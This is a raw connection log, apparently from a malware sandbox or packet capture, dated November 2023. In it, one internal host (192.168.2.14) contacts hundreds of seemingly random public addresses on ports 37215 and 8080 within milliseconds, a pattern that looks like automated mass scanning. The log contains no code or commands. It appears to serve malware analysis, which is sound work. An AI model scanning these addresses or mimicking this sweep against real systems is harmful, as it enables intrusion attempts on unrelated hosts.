                                              Nov 23, 2023 05:14:50.009682894 CET4783037215192.168.2.1441.61.197.141
                                              Nov 23, 2023 05:14:50.009684086 CET4783037215192.168.2.1441.144.203.157
                                              Nov 23, 2023 05:14:50.009691000 CET4783037215192.168.2.14156.72.128.29
                                              Nov 23, 2023 05:14:50.009696007 CET4783037215192.168.2.14197.237.106.184
                                              Nov 23, 2023 05:14:50.009701014 CET4783037215192.168.2.14197.198.53.18
                                              Nov 23, 2023 05:14:50.009711981 CET4783037215192.168.2.1441.247.72.252
                                              Nov 23, 2023 05:14:50.009713888 CET4783037215192.168.2.1441.75.251.25
                                              Nov 23, 2023 05:14:50.009726048 CET4783037215192.168.2.14156.56.44.86
                                              Nov 23, 2023 05:14:50.009727001 CET4783037215192.168.2.14156.193.121.40
                                              Nov 23, 2023 05:14:50.009727001 CET4783037215192.168.2.1441.154.202.244
                                              Nov 23, 2023 05:14:50.009730101 CET4783037215192.168.2.1441.114.222.192
                                              Nov 23, 2023 05:14:50.009731054 CET4783037215192.168.2.14156.19.192.134
                                              Nov 23, 2023 05:14:50.009732962 CET4783037215192.168.2.1441.197.142.50
                                              Nov 23, 2023 05:14:50.009746075 CET4783037215192.168.2.1441.5.208.222
                                              Nov 23, 2023 05:14:50.009747028 CET4783037215192.168.2.14197.211.170.216
                                              Nov 23, 2023 05:14:50.009747028 CET4783037215192.168.2.1441.100.238.139
                                              Nov 23, 2023 05:14:50.009756088 CET4783037215192.168.2.1441.145.130.118
                                              Nov 23, 2023 05:14:50.009764910 CET4783037215192.168.2.14197.9.240.165
                                              Nov 23, 2023 05:14:50.009764910 CET4783037215192.168.2.1441.254.142.156
                                              Nov 23, 2023 05:14:50.009773016 CET4783037215192.168.2.14156.120.237.165
                                              Nov 23, 2023 05:14:50.009776115 CET4783037215192.168.2.14156.56.19.83
                                              Nov 23, 2023 05:14:50.009776115 CET4783037215192.168.2.14156.60.78.147
                                              Nov 23, 2023 05:14:50.009783030 CET4783037215192.168.2.1441.228.99.208
                                              Nov 23, 2023 05:14:50.009783030 CET4783037215192.168.2.14197.210.179.216
                                              Nov 23, 2023 05:14:50.009783030 CET4783037215192.168.2.1441.63.229.6
                                              Nov 23, 2023 05:14:50.009783983 CET4783037215192.168.2.14156.70.222.142
                                              Nov 23, 2023 05:14:50.009792089 CET4783037215192.168.2.14197.207.181.224
                                              Nov 23, 2023 05:14:50.009799957 CET4783037215192.168.2.14197.59.226.192
                                              Nov 23, 2023 05:14:50.009805918 CET4783037215192.168.2.1441.196.127.25
                                              Nov 23, 2023 05:14:50.033672094 CET478168080192.168.2.1462.4.98.147
                                              Nov 23, 2023 05:14:50.033674002 CET478168080192.168.2.1494.3.37.248
                                              Nov 23, 2023 05:14:50.033689976 CET478168080192.168.2.1462.107.28.26
                                              Nov 23, 2023 05:14:50.033690929 CET478168080192.168.2.1495.241.41.16
                                              Nov 23, 2023 05:14:50.033691883 CET478168080192.168.2.1494.198.171.45
                                              Nov 23, 2023 05:14:50.033691883 CET478168080192.168.2.1462.75.177.1
                                              Nov 23, 2023 05:14:50.033691883 CET478168080192.168.2.1431.70.34.4
                                              Nov 23, 2023 05:14:50.033691883 CET478168080192.168.2.1462.22.200.165
                                              Nov 23, 2023 05:14:50.033694983 CET478168080192.168.2.1494.199.133.198
                                              Nov 23, 2023 05:14:50.033694983 CET478168080192.168.2.1485.35.217.59
                                              Nov 23, 2023 05:14:50.033700943 CET478168080192.168.2.1485.157.69.207
                                              Nov 23, 2023 05:14:50.033715010 CET478168080192.168.2.1495.250.139.76
                                              Nov 23, 2023 05:14:50.033715010 CET478168080192.168.2.1462.92.157.66
                                              Nov 23, 2023 05:14:50.033719063 CET478168080192.168.2.1485.249.243.106
                                              Nov 23, 2023 05:14:50.033729076 CET478168080192.168.2.1431.105.218.14
                                              Nov 23, 2023 05:14:50.033729076 CET478168080192.168.2.1431.62.169.119
                                              Nov 23, 2023 05:14:50.033730984 CET478168080192.168.2.1494.166.103.98
                                              Nov 23, 2023 05:14:50.033730984 CET478168080192.168.2.1495.32.125.166
                                              Nov 23, 2023 05:14:50.033731937 CET478168080192.168.2.1431.94.163.162
                                              Nov 23, 2023 05:14:50.033742905 CET478168080192.168.2.1431.190.57.226
                                              Nov 23, 2023 05:14:50.033745050 CET478168080192.168.2.1431.29.215.64
                                              Nov 23, 2023 05:14:50.033755064 CET478168080192.168.2.1495.252.23.110
                                              Nov 23, 2023 05:14:50.033760071 CET478168080192.168.2.1485.246.21.122
                                              Nov 23, 2023 05:14:50.033761978 CET478168080192.168.2.1494.62.52.74
                                              Nov 23, 2023 05:14:50.033770084 CET478168080192.168.2.1462.130.182.77
                                              Nov 23, 2023 05:14:50.033776999 CET478168080192.168.2.1494.255.4.6
                                              Nov 23, 2023 05:14:50.033781052 CET478168080192.168.2.1494.31.217.93
                                              Nov 23, 2023 05:14:50.033793926 CET478168080192.168.2.1462.189.249.52
                                              Nov 23, 2023 05:14:50.033795118 CET478168080192.168.2.1485.219.166.63
                                              Nov 23, 2023 05:14:50.033799887 CET478168080192.168.2.1431.77.253.118
                                              Nov 23, 2023 05:14:50.033812046 CET478168080192.168.2.1485.249.4.51
                                              Nov 23, 2023 05:14:50.033813000 CET478168080192.168.2.1431.54.212.126
                                              Nov 23, 2023 05:14:50.033816099 CET478168080192.168.2.1495.91.177.251
                                              Nov 23, 2023 05:14:50.033824921 CET478168080192.168.2.1485.153.157.174
                                              Nov 23, 2023 05:14:50.033827066 CET478168080192.168.2.1485.28.187.175
                                              Nov 23, 2023 05:14:50.033843994 CET478168080192.168.2.1495.83.167.189
                                              Nov 23, 2023 05:14:50.033849001 CET478168080192.168.2.1485.107.195.40
                                              Nov 23, 2023 05:14:50.033849001 CET478168080192.168.2.1495.94.51.201
                                              Nov 23, 2023 05:14:50.033850908 CET478168080192.168.2.1462.200.64.86
                                              Nov 23, 2023 05:14:50.033860922 CET478168080192.168.2.1495.132.250.93
                                              Nov 23, 2023 05:14:50.033871889 CET478168080192.168.2.1462.187.110.65
                                              Nov 23, 2023 05:14:50.033883095 CET478168080192.168.2.1494.211.20.22
                                              Nov 23, 2023 05:14:50.033883095 CET478168080192.168.2.1485.109.133.215
                                              Nov 23, 2023 05:14:50.033896923 CET478168080192.168.2.1485.69.174.237
                                              Nov 23, 2023 05:14:50.033896923 CET478168080192.168.2.1485.39.214.12
                                              Nov 23, 2023 05:14:50.033906937 CET478168080192.168.2.1462.92.192.20
                                              Nov 23, 2023 05:14:50.033907890 CET478168080192.168.2.1462.172.2.91
                                              Nov 23, 2023 05:14:50.033914089 CET478168080192.168.2.1485.183.122.132
                                              Nov 23, 2023 05:14:50.033915043 CET478168080192.168.2.1462.234.37.182
                                              Nov 23, 2023 05:14:50.033922911 CET478168080192.168.2.1485.120.70.31
                                              Nov 23, 2023 05:14:50.033927917 CET478168080192.168.2.1495.88.143.25
                                              Nov 23, 2023 05:14:50.033930063 CET478168080192.168.2.1494.8.245.251
                                              Nov 23, 2023 05:14:50.033948898 CET478168080192.168.2.1485.251.238.70
                                              Nov 23, 2023 05:14:50.033950090 CET478168080192.168.2.1485.21.219.36
                                              Nov 23, 2023 05:14:50.033950090 CET478168080192.168.2.1494.50.252.109
                                              Nov 23, 2023 05:14:50.033961058 CET478168080192.168.2.1494.203.1.20
                                              Nov 23, 2023 05:14:50.033963919 CET478168080192.168.2.1494.64.40.155
                                              Nov 23, 2023 05:14:50.033976078 CET478168080192.168.2.1494.4.170.142
                                              Nov 23, 2023 05:14:50.033982992 CET478168080192.168.2.1462.23.226.27
                                              Nov 23, 2023 05:14:50.033989906 CET478168080192.168.2.1462.117.101.21
                                              Nov 23, 2023 05:14:50.033992052 CET478168080192.168.2.1494.112.198.88
                                              Nov 23, 2023 05:14:50.034007072 CET478168080192.168.2.1431.31.83.45
                                              Nov 23, 2023 05:14:50.034007072 CET478168080192.168.2.1495.43.184.128
                                              Nov 23, 2023 05:14:50.034015894 CET478168080192.168.2.1495.177.175.76
                                              Nov 23, 2023 05:14:50.034035921 CET478168080192.168.2.1485.165.81.59
                                              Nov 23, 2023 05:14:50.034035921 CET478168080192.168.2.1485.41.170.121
                                              Nov 23, 2023 05:14:50.034035921 CET478168080192.168.2.1495.149.227.53
                                              Nov 23, 2023 05:14:50.034039021 CET478168080192.168.2.1495.171.41.79
                                              Nov 23, 2023 05:14:50.034048080 CET478168080192.168.2.1485.78.92.120
                                              Nov 23, 2023 05:14:50.034048080 CET478168080192.168.2.1485.249.38.129
                                              Nov 23, 2023 05:14:50.034054995 CET478168080192.168.2.1485.7.198.188
                                              Nov 23, 2023 05:14:50.034070015 CET478168080192.168.2.1462.241.87.5
                                              Nov 23, 2023 05:14:50.034074068 CET478168080192.168.2.1431.135.112.208
                                              Nov 23, 2023 05:14:50.034082890 CET478168080192.168.2.1494.144.143.228
                                              Nov 23, 2023 05:14:50.034082890 CET478168080192.168.2.1431.160.95.20
                                              Nov 23, 2023 05:14:50.034095049 CET478168080192.168.2.1462.1.66.107
                                              Nov 23, 2023 05:14:50.034095049 CET478168080192.168.2.1431.140.80.192
                                              Nov 23, 2023 05:14:50.034097910 CET478168080192.168.2.1485.233.108.195
                                              Nov 23, 2023 05:14:50.034109116 CET478168080192.168.2.1431.142.144.129
                                              Nov 23, 2023 05:14:50.034111023 CET478168080192.168.2.1494.159.167.184
                                              Nov 23, 2023 05:14:50.034125090 CET478168080192.168.2.1494.70.145.244
                                              Nov 23, 2023 05:14:50.034125090 CET478168080192.168.2.1494.127.42.46
                                              Nov 23, 2023 05:14:50.034137964 CET478168080192.168.2.1431.16.79.176
                                              Nov 23, 2023 05:14:50.034138918 CET478168080192.168.2.1494.94.179.9
                                              Nov 23, 2023 05:14:50.034138918 CET478168080192.168.2.1485.131.159.46
                                              Nov 23, 2023 05:14:50.034143925 CET478168080192.168.2.1431.0.191.252
                                              Nov 23, 2023 05:14:50.034158945 CET478168080192.168.2.1495.120.175.225
                                              Nov 23, 2023 05:14:50.034158945 CET478168080192.168.2.1431.233.49.224
                                              Nov 23, 2023 05:14:50.034157991 CET478168080192.168.2.1462.114.34.43
                                              Nov 23, 2023 05:14:50.034162998 CET478168080192.168.2.1462.44.158.128
                                              Nov 23, 2023 05:14:50.034176111 CET478168080192.168.2.1431.117.150.230
                                              Nov 23, 2023 05:14:50.034176111 CET478168080192.168.2.1494.85.241.89
                                              Nov 23, 2023 05:14:50.034188032 CET478168080192.168.2.1495.186.230.251
                                              Nov 23, 2023 05:14:50.034188986 CET478168080192.168.2.1431.101.52.67
                                              Nov 23, 2023 05:14:50.034192085 CET478168080192.168.2.1495.184.101.105
                                              Nov 23, 2023 05:14:50.034193039 CET478168080192.168.2.1431.196.94.236
                                              Nov 23, 2023 05:14:50.034195900 CET478168080192.168.2.1485.21.174.212
                                              Nov 23, 2023 05:14:50.034209013 CET478168080192.168.2.1462.248.214.242
                                              Nov 23, 2023 05:14:50.034209967 CET478168080192.168.2.1495.242.70.178
                                              Nov 23, 2023 05:14:50.034209967 CET478168080192.168.2.1495.161.163.188
                                              Nov 23, 2023 05:14:50.034213066 CET478168080192.168.2.1494.58.240.77
                                              Nov 23, 2023 05:14:50.034228086 CET478168080192.168.2.1485.91.178.11
                                              Nov 23, 2023 05:14:50.034235954 CET478168080192.168.2.1485.154.22.50
                                              Nov 23, 2023 05:14:50.034244061 CET478168080192.168.2.1431.37.238.160
                                              Nov 23, 2023 05:14:50.034245014 CET478168080192.168.2.1485.197.129.7
                                              Nov 23, 2023 05:14:50.034252882 CET478168080192.168.2.1431.64.129.46
                                              Nov 23, 2023 05:14:50.034255028 CET478168080192.168.2.1431.143.124.219
                                              Nov 23, 2023 05:14:50.034255028 CET478168080192.168.2.1462.154.127.202
                                              Nov 23, 2023 05:14:50.034259081 CET478168080192.168.2.1494.15.224.141
                                              Nov 23, 2023 05:14:50.034259081 CET478168080192.168.2.1495.221.55.193
                                              Nov 23, 2023 05:14:50.034260988 CET478168080192.168.2.1495.178.252.235
                                              Nov 23, 2023 05:14:50.034261942 CET478168080192.168.2.1494.102.219.24
                                              Nov 23, 2023 05:14:50.034271002 CET478168080192.168.2.1494.168.229.149
                                              Nov 23, 2023 05:14:50.034272909 CET478168080192.168.2.1485.203.6.70
                                              Nov 23, 2023 05:14:50.034281969 CET478168080192.168.2.1431.76.226.156
                                              Nov 23, 2023 05:14:50.034287930 CET478168080192.168.2.1462.51.176.9
                                              Nov 23, 2023 05:14:50.034297943 CET478168080192.168.2.1495.112.216.43
                                              Nov 23, 2023 05:14:50.034303904 CET478168080192.168.2.1431.67.201.97
                                              Nov 23, 2023 05:14:50.034321070 CET478168080192.168.2.1431.122.30.4
                                              Nov 23, 2023 05:14:50.034324884 CET478168080192.168.2.1495.233.122.16
                                              Nov 23, 2023 05:14:50.034324884 CET478168080192.168.2.1431.198.33.94
                                              Nov 23, 2023 05:14:50.034326077 CET478168080192.168.2.1495.137.123.163
                                              Nov 23, 2023 05:14:50.034332037 CET478168080192.168.2.1495.39.149.109
                                              Nov 23, 2023 05:14:50.034334898 CET478168080192.168.2.1495.229.79.34
                                              Nov 23, 2023 05:14:50.034334898 CET478168080192.168.2.1462.95.223.59
                                              Nov 23, 2023 05:14:50.034347057 CET478168080192.168.2.1485.42.234.186
                                              Nov 23, 2023 05:14:50.034348011 CET478168080192.168.2.1462.227.131.238
                                              Nov 23, 2023 05:14:50.034348965 CET478168080192.168.2.1462.62.22.3
                                              Nov 23, 2023 05:14:50.034348965 CET478168080192.168.2.1494.24.223.110
                                              Nov 23, 2023 05:14:50.034348965 CET478168080192.168.2.1462.35.204.117
                                              Nov 23, 2023 05:14:50.034356117 CET478168080192.168.2.1462.7.226.118
                                              Nov 23, 2023 05:14:50.034356117 CET478168080192.168.2.1494.182.108.43
                                              Nov 23, 2023 05:14:50.034360886 CET478168080192.168.2.1494.9.238.157
                                              Nov 23, 2023 05:14:50.034362078 CET478168080192.168.2.1485.41.55.234
                                              Nov 23, 2023 05:14:50.034362078 CET478168080192.168.2.1485.226.209.10
                                              Nov 23, 2023 05:14:50.034370899 CET478168080192.168.2.1485.52.173.79
                                              Nov 23, 2023 05:14:50.034370899 CET478168080192.168.2.1485.185.129.33
                                              Nov 23, 2023 05:14:50.034375906 CET478168080192.168.2.1462.161.38.203
                                              Nov 23, 2023 05:14:50.034384966 CET478168080192.168.2.1495.228.27.25
                                              Nov 23, 2023 05:14:50.034393072 CET478168080192.168.2.1431.82.135.68
                                              Nov 23, 2023 05:14:50.034393072 CET478168080192.168.2.1485.218.1.67
                                              Nov 23, 2023 05:14:50.034398079 CET478168080192.168.2.1462.179.129.66
                                              Nov 23, 2023 05:14:50.034409046 CET478168080192.168.2.1494.87.145.93
                                              Nov 23, 2023 05:14:50.034415960 CET478168080192.168.2.1495.143.110.89
                                              Nov 23, 2023 05:14:50.034418106 CET478168080192.168.2.1485.175.209.216
                                              Nov 23, 2023 05:14:50.034432888 CET478168080192.168.2.1431.136.62.2
                                              Nov 23, 2023 05:14:50.034440041 CET478168080192.168.2.1485.228.59.20
                                              Nov 23, 2023 05:14:50.034446001 CET478168080192.168.2.1431.146.178.133
                                              Nov 23, 2023 05:14:50.034449100 CET478168080192.168.2.1462.187.75.135
                                              Nov 23, 2023 05:14:50.034459114 CET478168080192.168.2.1485.145.180.247
                                              Nov 23, 2023 05:14:50.034466982 CET478168080192.168.2.1494.121.170.74
                                              Nov 23, 2023 05:14:50.034466982 CET478168080192.168.2.1485.176.220.242
                                              Nov 23, 2023 05:14:50.034476995 CET478168080192.168.2.1495.202.203.128
                                              Nov 23, 2023 05:14:50.034477949 CET478168080192.168.2.1495.130.221.189
                                              Nov 23, 2023 05:14:50.034478903 CET478168080192.168.2.1495.227.165.87
                                              Nov 23, 2023 05:14:50.034482956 CET478168080192.168.2.1485.160.158.170
                                              Nov 23, 2023 05:14:50.034492970 CET478168080192.168.2.1462.94.214.12
                                              Nov 23, 2023 05:14:50.034498930 CET478168080192.168.2.1494.55.241.181
                                              Nov 23, 2023 05:14:50.034501076 CET478168080192.168.2.1494.5.237.195
                                              Nov 23, 2023 05:14:50.034501076 CET478168080192.168.2.1462.201.167.33
                                              Nov 23, 2023 05:14:50.034506083 CET478168080192.168.2.1485.179.129.176
                                              Nov 23, 2023 05:14:50.034517050 CET478168080192.168.2.1462.246.197.26
                                              Nov 23, 2023 05:14:50.034524918 CET478168080192.168.2.1462.235.26.186
                                              Nov 23, 2023 05:14:50.034532070 CET478168080192.168.2.1485.105.88.113
                                              Nov 23, 2023 05:14:50.034532070 CET478168080192.168.2.1462.61.54.223
                                              Nov 23, 2023 05:14:50.034533978 CET478168080192.168.2.1431.0.220.251
                                              Nov 23, 2023 05:14:50.034549952 CET478168080192.168.2.1462.72.223.87
                                              Nov 23, 2023 05:14:50.034552097 CET478168080192.168.2.1494.35.94.234
                                              Nov 23, 2023 05:14:50.034557104 CET478168080192.168.2.1485.186.27.140
                                              Nov 23, 2023 05:14:50.034567118 CET478168080192.168.2.1495.62.222.63
                                              Nov 23, 2023 05:14:50.034575939 CET478168080192.168.2.1494.26.122.108
                                              Nov 23, 2023 05:14:50.034579039 CET478168080192.168.2.1494.40.198.82
                                              Nov 23, 2023 05:14:50.034581900 CET478168080192.168.2.1431.196.49.158
                                              Nov 23, 2023 05:14:50.034588099 CET478168080192.168.2.1494.180.6.19
                                              Nov 23, 2023 05:14:50.034595966 CET478168080192.168.2.1495.143.23.201
                                              Nov 23, 2023 05:14:50.034599066 CET478168080192.168.2.1495.165.209.147
                                              Nov 23, 2023 05:14:50.034607887 CET478168080192.168.2.1494.9.185.164
                                              Nov 23, 2023 05:14:50.034611940 CET478168080192.168.2.1494.107.63.179
                                              Nov 23, 2023 05:14:50.034621954 CET478168080192.168.2.1494.175.18.33
                                              Nov 23, 2023 05:14:50.034625053 CET478168080192.168.2.1462.153.25.40
                                              Nov 23, 2023 05:14:50.034635067 CET478168080192.168.2.1462.166.202.179
                                              Nov 23, 2023 05:14:50.034637928 CET478168080192.168.2.1431.233.150.146
                                              Nov 23, 2023 05:14:50.034653902 CET478168080192.168.2.1495.128.105.158
                                              Nov 23, 2023 05:14:50.034653902 CET478168080192.168.2.1485.87.67.171
                                              Nov 23, 2023 05:14:50.034653902 CET478168080192.168.2.1494.69.64.71
                                              Nov 23, 2023 05:14:50.034656048 CET478168080192.168.2.1495.244.212.97
                                              Nov 23, 2023 05:14:50.034662962 CET478168080192.168.2.1494.148.187.100
                                              Nov 23, 2023 05:14:50.034668922 CET478168080192.168.2.1495.235.167.149
                                              Nov 23, 2023 05:14:50.034671068 CET478168080192.168.2.1462.38.109.145
                                              Nov 23, 2023 05:14:50.034677029 CET478168080192.168.2.1494.244.89.210
                                              Nov 23, 2023 05:14:50.034689903 CET478168080192.168.2.1495.29.195.64
                                              Nov 23, 2023 05:14:50.034693003 CET478168080192.168.2.1494.225.118.164
                                              Nov 23, 2023 05:14:50.034696102 CET478168080192.168.2.1462.151.29.179
                                              Nov 23, 2023 05:14:50.034710884 CET478168080192.168.2.1462.252.52.116
                                              Nov 23, 2023 05:14:50.034712076 CET478168080192.168.2.1485.249.105.191
                                              Nov 23, 2023 05:14:50.034717083 CET478168080192.168.2.1462.95.16.219
                                              Nov 23, 2023 05:14:50.034718037 CET478168080192.168.2.1494.129.231.200
                                              Nov 23, 2023 05:14:50.034723997 CET478168080192.168.2.1462.122.180.172
                                              Nov 23, 2023 05:14:50.034735918 CET478168080192.168.2.1495.166.126.43
                                              Nov 23, 2023 05:14:50.034737110 CET478168080192.168.2.1494.94.165.33
                                              Nov 23, 2023 05:14:50.034748077 CET478168080192.168.2.1431.72.50.52
                                              Nov 23, 2023 05:14:50.034749985 CET478168080192.168.2.1495.132.94.174
                                              Nov 23, 2023 05:14:50.034763098 CET478168080192.168.2.1462.253.48.28
                                              Nov 23, 2023 05:14:50.034766912 CET478168080192.168.2.1462.178.101.66
                                              Nov 23, 2023 05:14:50.034768105 CET478168080192.168.2.1494.225.248.215
                                              Nov 23, 2023 05:14:50.034768105 CET478168080192.168.2.1494.95.57.241
                                              Nov 23, 2023 05:14:50.034781933 CET478168080192.168.2.1462.156.67.147
                                              Nov 23, 2023 05:14:50.034782887 CET478168080192.168.2.1485.35.71.7
                                              Nov 23, 2023 05:14:50.034791946 CET478168080192.168.2.1431.117.177.26
                                              Nov 23, 2023 05:14:50.034795046 CET478168080192.168.2.1485.13.254.234
                                              Nov 23, 2023 05:14:50.034796000 CET478168080192.168.2.1485.27.175.201
                                              Nov 23, 2023 05:14:50.034807920 CET478168080192.168.2.1494.154.116.14
                                              Nov 23, 2023 05:14:50.034813881 CET478168080192.168.2.1462.196.213.210
                                              Nov 23, 2023 05:14:50.034823895 CET478168080192.168.2.1485.225.108.42
                                              Nov 23, 2023 05:14:50.034823895 CET478168080192.168.2.1485.165.43.158
                                              Nov 23, 2023 05:14:50.034836054 CET478168080192.168.2.1495.245.121.224
                                              Nov 23, 2023 05:14:50.034845114 CET478168080192.168.2.1431.69.29.192
                                              Nov 23, 2023 05:14:50.034846067 CET478168080192.168.2.1494.173.13.23
                                              Nov 23, 2023 05:14:50.034849882 CET478168080192.168.2.1462.171.7.50
                                              Nov 23, 2023 05:14:50.034853935 CET478168080192.168.2.1495.35.56.234
                                              Nov 23, 2023 05:14:50.034863949 CET478168080192.168.2.1431.215.108.18
                                              Nov 23, 2023 05:14:50.034866095 CET478168080192.168.2.1462.21.36.73
                                              Nov 23, 2023 05:14:50.034879923 CET478168080192.168.2.1494.172.81.97
                                              Nov 23, 2023 05:14:50.034882069 CET478168080192.168.2.1485.116.39.46
                                              Nov 23, 2023 05:14:50.034883022 CET478168080192.168.2.1462.103.46.65
                                              Nov 23, 2023 05:14:50.034894943 CET478168080192.168.2.1495.150.8.10
                                              Nov 23, 2023 05:14:50.034897089 CET478168080192.168.2.1462.193.193.168
                                              Nov 23, 2023 05:14:50.034897089 CET478168080192.168.2.1494.221.218.61
                                              Nov 23, 2023 05:14:50.034902096 CET478168080192.168.2.1495.221.231.196
                                              Nov 23, 2023 05:14:50.034914970 CET478168080192.168.2.1431.197.168.82
                                              Nov 23, 2023 05:14:50.034920931 CET478168080192.168.2.1462.134.67.153
                                              Nov 23, 2023 05:14:50.034924984 CET478168080192.168.2.1494.163.217.64
                                              Nov 23, 2023 05:14:50.034929037 CET478168080192.168.2.1485.28.198.31
                                              Nov 23, 2023 05:14:50.034929991 CET478168080192.168.2.1485.124.43.48
                                              Nov 23, 2023 05:14:50.034944057 CET478168080192.168.2.1462.209.44.181
                                              Nov 23, 2023 05:14:50.034945965 CET478168080192.168.2.1494.3.230.112
                                              Nov 23, 2023 05:14:50.034945965 CET478168080192.168.2.1494.151.195.62
                                              Nov 23, 2023 05:14:50.034960032 CET478168080192.168.2.1494.169.173.127
                                              Nov 23, 2023 05:14:50.034966946 CET478168080192.168.2.1495.245.241.38
                                              Nov 23, 2023 05:14:50.034970999 CET478168080192.168.2.1485.124.111.151
                                              Nov 23, 2023 05:14:50.034975052 CET478168080192.168.2.1462.152.123.83
                                              Nov 23, 2023 05:14:50.034981012 CET478168080192.168.2.1494.58.196.202
                                              Nov 23, 2023 05:14:50.034991026 CET478168080192.168.2.1485.129.104.46
                                              Nov 23, 2023 05:14:50.034992933 CET478168080192.168.2.1494.204.197.250
                                              Nov 23, 2023 05:14:50.034992933 CET478168080192.168.2.1485.255.155.33
                                              Nov 23, 2023 05:14:50.035003901 CET478168080192.168.2.1462.223.130.33
                                              Nov 23, 2023 05:14:50.035008907 CET478168080192.168.2.1431.246.151.118
                                              Nov 23, 2023 05:14:50.035015106 CET478168080192.168.2.1485.221.167.68
                                              Nov 23, 2023 05:14:50.035026073 CET478168080192.168.2.1495.88.71.71
                                              Nov 23, 2023 05:14:50.035027981 CET478168080192.168.2.1494.217.205.51
                                              Nov 23, 2023 05:14:50.035036087 CET478168080192.168.2.1485.219.93.161
                                              Nov 23, 2023 05:14:50.035043001 CET478168080192.168.2.1462.230.22.245
                                              Nov 23, 2023 05:14:50.035049915 CET478168080192.168.2.1462.139.225.6
                                              Nov 23, 2023 05:14:50.035053015 CET478168080192.168.2.1494.173.121.75
                                              Nov 23, 2023 05:14:50.035062075 CET478168080192.168.2.1485.204.184.56
                                              Nov 23, 2023 05:14:50.035068989 CET478168080192.168.2.1495.10.75.154
                                              Nov 23, 2023 05:14:50.035070896 CET478168080192.168.2.1494.112.9.187
                                              Nov 23, 2023 05:14:50.035084009 CET478168080192.168.2.1495.158.36.76
                                              Nov 23, 2023 05:14:50.035084963 CET478168080192.168.2.1431.26.255.201
                                              Nov 23, 2023 05:14:50.035084963 CET478168080192.168.2.1462.97.36.154
                                              Nov 23, 2023 05:14:50.035094023 CET478168080192.168.2.1495.153.47.107
                                              Nov 23, 2023 05:14:50.035099983 CET478168080192.168.2.1494.144.127.200
                                              Nov 23, 2023 05:14:50.035104036 CET478168080192.168.2.1495.235.193.216
                                              Nov 23, 2023 05:14:50.035108089 CET478168080192.168.2.1485.223.157.215
                                              Nov 23, 2023 05:14:50.035120964 CET478168080192.168.2.1462.235.131.243
                                              Nov 23, 2023 05:14:50.035121918 CET478168080192.168.2.1494.158.102.41
                                              Nov 23, 2023 05:14:50.035121918 CET478168080192.168.2.1431.173.61.155
                                              Nov 23, 2023 05:14:50.035131931 CET478168080192.168.2.1431.57.253.173
                                              Nov 23, 2023 05:14:50.035134077 CET478168080192.168.2.1495.2.241.196
                                              Nov 23, 2023 05:14:50.035141945 CET478168080192.168.2.1494.108.21.164
                                              Nov 23, 2023 05:14:50.035150051 CET478168080192.168.2.1495.21.84.46
                                              Nov 23, 2023 05:14:50.035156012 CET478168080192.168.2.1485.8.109.60
                                              Nov 23, 2023 05:14:50.035165071 CET478168080192.168.2.1431.194.226.230
                                              Nov 23, 2023 05:14:50.035166979 CET478168080192.168.2.1495.66.29.49
                                              Nov 23, 2023 05:14:50.035176039 CET478168080192.168.2.1495.24.44.127
                                              Nov 23, 2023 05:14:50.035178900 CET478168080192.168.2.1485.48.50.241
                                              Nov 23, 2023 05:14:50.035187006 CET478168080192.168.2.1431.144.241.118
                                              Nov 23, 2023 05:14:50.035193920 CET478168080192.168.2.1431.52.40.77
                                              Nov 23, 2023 05:14:50.035200119 CET478168080192.168.2.1494.14.210.251
                                              Nov 23, 2023 05:14:50.035207033 CET478168080192.168.2.1494.36.72.43
                                              Nov 23, 2023 05:14:50.035219908 CET478168080192.168.2.1431.171.107.167
                                              Nov 23, 2023 05:14:50.035219908 CET478168080192.168.2.1485.47.64.144
                                              Nov 23, 2023 05:14:50.035221100 CET478168080192.168.2.1495.130.8.66
                                              Nov 23, 2023 05:14:50.035235882 CET478168080192.168.2.1494.75.222.233
                                              Nov 23, 2023 05:14:50.035235882 CET478168080192.168.2.1462.43.224.105
                                              Nov 23, 2023 05:14:50.035244942 CET478168080192.168.2.1431.136.234.181
                                              Nov 23, 2023 05:14:50.035248041 CET478168080192.168.2.1462.81.189.87
                                              Nov 23, 2023 05:14:50.035259962 CET478168080192.168.2.1462.108.105.194
                                              Nov 23, 2023 05:14:50.035264015 CET478168080192.168.2.1462.10.139.102
                                              Nov 23, 2023 05:14:50.035265923 CET478168080192.168.2.1494.252.81.164
                                              Nov 23, 2023 05:14:50.035269022 CET478168080192.168.2.1495.234.166.36
                                              Nov 23, 2023 05:14:50.035278082 CET478168080192.168.2.1485.140.3.233
                                              Nov 23, 2023 05:14:50.035283089 CET478168080192.168.2.1462.34.36.226
                                              Nov 23, 2023 05:14:50.035289049 CET478168080192.168.2.1431.119.37.112
                                              Nov 23, 2023 05:14:50.035296917 CET478168080192.168.2.1462.43.237.105
                                              Nov 23, 2023 05:14:50.035299063 CET478168080192.168.2.1495.76.128.15
                                              Nov 23, 2023 05:14:50.035311937 CET478168080192.168.2.1494.119.21.30
                                              Nov 23, 2023 05:14:50.035316944 CET478168080192.168.2.1495.184.134.79
                                              Nov 23, 2023 05:14:50.035322905 CET478168080192.168.2.1431.152.196.224
                                              Nov 23, 2023 05:14:50.035325050 CET478168080192.168.2.1485.251.17.201
                                              Nov 23, 2023 05:14:50.035337925 CET478168080192.168.2.1494.9.101.113
                                              Nov 23, 2023 05:14:50.035337925 CET478168080192.168.2.1462.54.236.237
                                              Nov 23, 2023 05:14:50.035351992 CET478168080192.168.2.1494.47.251.28
                                              Nov 23, 2023 05:14:50.035356998 CET478168080192.168.2.1495.54.119.0
                                              Nov 23, 2023 05:14:50.035356998 CET478168080192.168.2.1462.227.222.215
                                              Nov 23, 2023 05:14:50.035367012 CET478168080192.168.2.1462.189.28.246
                                              Nov 23, 2023 05:14:50.035367012 CET478168080192.168.2.1431.193.9.97
                                              Nov 23, 2023 05:14:50.035370111 CET478168080192.168.2.1495.201.14.150
                                              Nov 23, 2023 05:14:50.035377026 CET478168080192.168.2.1495.75.211.93
                                              Nov 23, 2023 05:14:50.035388947 CET478168080192.168.2.1431.248.124.180
                                              Nov 23, 2023 05:14:50.035388947 CET478168080192.168.2.1462.132.255.230
                                              Nov 23, 2023 05:14:50.035396099 CET478168080192.168.2.1495.42.231.21
                                              Nov 23, 2023 05:14:50.035396099 CET478168080192.168.2.1495.105.41.163
                                              Nov 23, 2023 05:14:50.035402060 CET478168080192.168.2.1485.123.206.146
                                              Nov 23, 2023 05:14:50.035406113 CET478168080192.168.2.1495.109.158.139
                                              Nov 23, 2023 05:14:50.035418987 CET478168080192.168.2.1494.26.98.72
                                              Nov 23, 2023 05:14:50.035419941 CET478168080192.168.2.1485.220.43.192
                                              Nov 23, 2023 05:14:50.035419941 CET478168080192.168.2.1462.255.4.188
                                              Nov 23, 2023 05:14:50.035434961 CET478168080192.168.2.1431.130.38.171
